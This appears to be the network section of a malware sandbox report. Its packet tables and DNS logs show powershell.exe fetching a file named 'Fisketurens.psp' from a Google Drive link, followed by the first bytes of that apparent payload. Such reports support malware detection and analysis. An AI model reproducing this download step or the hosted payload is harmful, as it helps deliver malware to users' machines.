              Jul 3, 2024 08:54:22.783699036 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.784555912 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.784606934 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.784611940 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.787086964 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.787117004 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.787137985 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.787153959 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.787158966 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.787224054 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.791572094 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.791654110 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.791666985 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.792078972 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.792136908 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.792141914 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.794609070 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.794742107 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.794754028 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.795510054 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.795641899 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.795649052 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.796461105 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.796547890 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.796555996 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.797672987 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.798620939 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.798635006 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.799874067 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.799937963 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.799943924 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.800798893 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.800843954 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.800848007 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.803369045 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.803641081 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.803646088 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.803901911 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.803987026 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.803991079 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.806334972 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.806427002 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.806432009 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.806924105 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.806976080 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.806981087 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.808706999 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.808759928 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.808765888 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.810204983 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.810259104 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.810262918 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.811678886 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.811721087 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.811724901 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.813070059 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.813096046 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.813126087 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.813131094 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.813167095 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.814873934 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.816823006 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.816867113 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.816886902 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.816891909 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.818854094 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.819003105 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.819542885 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.819586992 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.819590092 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.819598913 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.819638968 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.823153973 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.823734999 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.823760033 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.823786974 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.823787928 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.823795080 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.825942993 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.829437971 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.829463005 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.829499960 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.829504967 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.829613924 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.830008030 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.830059052 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.830102921 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.830106974 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.835721016 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.835756063 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.835771084 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.835776091 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.835814953 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.836180925 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.839466095 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.839523077 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.839528084 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.839638948 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.839680910 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.839684963 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.840234995 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.841089964 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.843641996 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.843647957 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.843839884 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.846292973 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.847204924 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.847229004 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.847282887 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.847287893 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.847985983 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.848000050 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.848004103 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.848081112 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.851248980 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.851982117 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.852005959 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.852031946 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.852035046 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.852041960 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.852072954 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.857422113 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.857495070 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.857559919 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.858153105 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.858179092 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.858205080 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.858315945 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.858323097 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.862464905 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.862540007 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.862546921 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.863185883 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.863213062 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.863233089 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.863236904 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.863276958 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.863281012 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.869071960 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.869102001 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.869174957 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.869193077 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.869311094 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.869873047 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.870357037 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.870404005 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.870409012 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.872876883 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.872900963 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.872931957 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.872936964 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.872981071 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.873555899 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.874353886 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.874445915 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.874453068 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.876974106 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.877288103 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.877299070 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.877305031 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.877367020 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.877372026 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.877866983 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.879345894 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.879350901 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.883070946 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.883097887 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.883971930 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.883992910 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.883999109 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.884040117 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.884718895 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.884780884 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.884785891 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.887420893 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.887474060 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.887479067 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.887881041 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.887933969 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.887938023 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.889347076 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.889403105 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.889406919 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.893138885 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.893170118 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.893362999 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.893368006 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.894165993 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.894176960 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.894181967 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.895889997 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.895895004 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.896962881 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.897011042 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.897015095 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.897629976 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.897677898 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.897681952 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.897958040 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.898001909 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.898006916 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.901448011 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.901499987 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.901504040 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.901839972 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.902750969 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.902764082 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.902767897 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.903644085 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.903647900 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.905730009 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.905793905 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.905798912 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.906316996 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.906390905 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.906394958 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.906804085 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.906856060 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.906860113 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.911921978 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.911953926 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.911987066 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.911992073 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.911995888 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.912026882 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.917305946 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.917372942 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.917377949 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.917792082 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.917818069 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.917840004 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.917865992 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.917870998 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.917901039 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.918899059 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.918953896 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.918957949 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.929414988 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.929501057 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.929507017 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.930444956 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.930476904 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.930594921 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.930599928 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.930690050 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.933192015 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.933811903 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.933839083 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.933862925 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.933882952 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.933887959 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.933907986 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.939202070 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.939282894 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.939287901 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.939678907 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.939711094 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.939732075 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.939743996 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.939749956 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.939799070 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.940177917 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.940207005 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.940268993 CEST49707443192.168.2.7172.217.16.193

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jul 3, 2024 08:54:19.524029016 CEST6329453192.168.2.71.1.1.1
              Jul 3, 2024 08:54:19.531003952 CEST53632941.1.1.1192.168.2.7
              Jul 3, 2024 08:54:20.596736908 CEST6208553192.168.2.71.1.1.1
              Jul 3, 2024 08:54:20.604581118 CEST53620851.1.1.1192.168.2.7

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jul 3, 2024 08:54:19.524029016 CEST192.168.2.71.1.1.10x85e1Standard query (0)drive.google.comA (IP address)IN (0x0001)false
              Jul 3, 2024 08:54:20.596736908 CEST192.168.2.71.1.1.10x88c1Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jul 3, 2024 08:54:19.531003952 CEST1.1.1.1192.168.2.70x85e1No error (0)drive.google.com216.58.206.46A (IP address)IN (0x0001)false
              Jul 3, 2024 08:54:20.604581118 CEST1.1.1.1192.168.2.70x88c1No error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • drive.google.com
              • drive.usercontent.google.com

              HTTPS Proxied Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.749706216.58.206.464438084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              2024-07-03 06:54:20 UTC215OUTGET /uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
              Host: drive.google.com
              Connection: Keep-Alive
              2024-07-03 06:54:20 UTC1598INHTTP/1.1 303 See Other
              Content-Type: application/binary
              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
              Pragma: no-cache
              Expires: Mon, 01 Jan 1990 00:00:00 GMT
              Date: Wed, 03 Jul 2024 06:54:20 GMT
              Location: https://drive.usercontent.google.com/download?id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU&export=download
              Strict-Transport-Security: max-age=31536000
              Cross-Origin-Opener-Policy: same-origin
              Content-Security-Policy: script-src 'nonce-QrINLkwzo3nsJrVqht4yWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
              Server: ESF
              Content-Length: 0
              X-XSS-Protection: 0
              X-Frame-Options: SAMEORIGIN
              X-Content-Type-Options: nosniff
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
              Connection: close


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.749707172.217.16.1934438084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              2024-07-03 06:54:21 UTC233OUTGET /download?id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU&export=download HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
              Host: drive.usercontent.google.com
              Connection: Keep-Alive
              2024-07-03 06:54:22 UTC4820INHTTP/1.1 200 OK
              Content-Type: application/octet-stream
              Content-Security-Policy: sandbox
              Content-Security-Policy: default-src 'none'
              Content-Security-Policy: frame-ancestors 'none'
              X-Content-Security-Policy: sandbox
              Cross-Origin-Opener-Policy: same-origin
              Cross-Origin-Embedder-Policy: require-corp
              Cross-Origin-Resource-Policy: same-site
              X-Content-Type-Options: nosniff
              Content-Disposition: attachment; filename="Fisketurens.psp"
              Access-Control-Allow-Origin: *
              Access-Control-Allow-Credentials: false
              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
              Accept-Ranges: bytes
              Content-Length: 442592
              Last-Modified: Tue, 02 Jul 2024 08:09:38 GMT
              X-GUploader-UploadID: ACJd0NoRKXCHthsJmEZV09U8vXA4B5g1kFjGJM1yU_HqBUWA4OeSmF2VIcKU8_-OjHf2KryBbyo
              Date: Wed, 03 Jul 2024 06:54:22 GMT
              Expires: Wed, 03 Jul 2024 06:54:22 GMT
              Cache-Control: private, max-age=0
              X-Goog-Hash: crc32c=ekC62A==
              Server: UploadServer
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
              Connection: close
              2024-07-03 06:54:22 UTC4820INData Raw: 63 51 47 62 63 51 47 62 75 30 67 30 47 67 44 72 41 72 7a 75 36 77 4c 41 47 41 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 70 53 50 32 6b 6e 45 42 6d 2b 73 43 49 59 43 42 36 61 68 53 2b 67 44 72 41 76 36 4e 63 51 47 62 67 63 45 44 4c 77 52 75 63 51 47 62 36 77 4b 4a 4a 48 45 42 6d 33 45 42 6d 37 70 56 51 33 55 59 63 51 47 62 63 51 47 62 63 51 47 62 36 77 4a 63 70 44 48 4b 36 77 4c 30 77 75 73 43 37 38 53 4a 46 41 76 72 41 73 62 59 63 51 47 62 30 65 4c 72 41 67 37 48 63 51 47 62 67 38 45 45 63 51 47 62 36 77 4a 33 30 49 48 35 65 42 37 6d 41 6e 7a 4b 36 77 4a 6c 2f 65 73 43 6a 4c 69 4c 52 43 51 45 63 51 47 62 36 77 4a 32 45 59 6e 44 63 51 47 62 63 51 47 62 67 63 50 34 52 77 49 42 63 51 47 62 63 51 47 62 75 73 55 54 43 6e 5a 78 41 5a 74 78 41 5a 75 42 38 71 75
